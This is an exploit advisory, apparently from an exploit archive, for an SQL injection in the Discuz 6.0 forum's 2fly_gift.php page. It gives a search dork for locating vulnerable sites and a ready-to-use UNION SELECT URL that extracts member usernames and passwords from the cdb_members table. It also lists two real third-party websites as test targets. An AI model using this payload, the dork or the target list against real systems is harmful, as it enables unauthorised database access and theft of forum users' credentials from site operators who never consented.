Discuz version 6.0 suffers from a remote SQL injection vulnerability.
e8b8763149ee62b88075044f2d3d6c39eba1cc197ad4d1036df347767dce6ac4######################### Securitylab.ir ########################
# Application Info:
# Name: Discuz
# Version: 6.0
# Website: http://www.discuz.net
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection Vulnerability
# Risk: Medium
# Dork: © 2008 - 2009 Powered by discuz inurl:2fly_gift.php
#===========================================================
#http://site.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
#===========================================================
#################################################################
# test:
# http://www.iacct.cn
# http://bbs.fpsba.com
#################################################################
# Securitylab Security Research Team
###################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed